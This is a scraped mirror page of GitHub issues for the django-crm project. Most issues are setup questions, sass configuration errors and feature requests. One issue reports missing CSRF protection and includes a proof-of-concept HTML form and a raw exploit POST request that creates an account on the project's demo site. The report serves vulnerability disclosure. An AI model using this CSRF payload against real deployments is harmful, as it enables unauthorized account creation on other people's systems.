Code Monkey home page Code Monkey logo

django-crm's Issues

How to add my user in CRM ?

Hello, I am get source Django-CRM. Start server by "python manage.py runserver", open login page to CRM , but I dont know how to add my account data in to. Can you tell me how to add account date to the CRM?

Hello vineeshan

There is already a quite far developed django based crm.
I would appreciate when we could start to work together on the same project.
Let us discuss by email [email protected]

CSRF vulnerability almost all forms

For example USer creation form has no csrf token validation, so that attacker can create own account by sending malicious link

POC :

<tr><td>last_name</td><td><input type="text" value="abuthahir++" name="last_name"></td></tr>
<tr><td>username</td><td><input type="text" value="abu" name="username"></td></tr>
<tr><td>email</td><td><input type="text" value="[email protected]" name="email"></td></tr>
<tr><td>role</td><td><input type="text" value="" name="role"></td></tr>
<tr><td>password</td><td><input type="text" value="reset!23" name="password"></td></tr>
</table><input type="submit" value="http://django-crm.micropyramid.com/users/create/"></form></html>```




EXPLOIT REQUEST:

POST /users/create/ HTTP/1.1
Host: django-crm.micropyramid.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://django-crm.micropyramid.com/users/create/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Cookie: sessionid=g8up9d4xvqga5rwk1m7f4e4mhxmy111
Connection: close
Upgrade-Insecure-Requests: 1

first_name=syed&last_name=abuthahir++&username=abu&email=test%40gmail.com&role=&password=reset%2123

add wiki

  • installation
  • development process
  • release process

Email and Planner apps disabled in urls.py

You have the email and planner apps commented out in the main crm/urls.py. Is this intentional as you are still developing this CRM? Are you planning to add documentation on how to enable these features at http://django-crm.readthedocs.io ? These features/documentation would be very helpful!

# url(r'^emails/', include('emails.urls', namespace='emails')),
# url(r'^planner/', include('planner.urls', namespace='planner')),

Exception Type FilterError sass: not found

trying to start your crm but gets into problems

Exception Type: FilterError
Exception Value: /bin/sh: 1: sass: not found

I am wondering if there is a dependicy missing?

add invoicing feature

  • create invoice and save it or keep it as draft
  • send invoice to client
  • add partial payments
  • list all invoices
  • birds eye view dashboard

FilterError at /login/

Unable to apply CachedCompilerFilter (sass --scss {infile} {outfile})
Could not find an option named "scss".

Usage: sass [output]

COMPRESS_PRECOMPILERS = (
('text/less', 'lessc {infile} {outfile}'),
('text/x-sass', 'sass {infile} {outfile}'),
('text/x-scss', 'sass --scss {infile} {outfile}'),
)

I removed the -css on settings and work.
What is wrong?

Can't access 'users'

After creating a superuser and logging in, I do not see the tab with 'Users'.
Any idea?

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.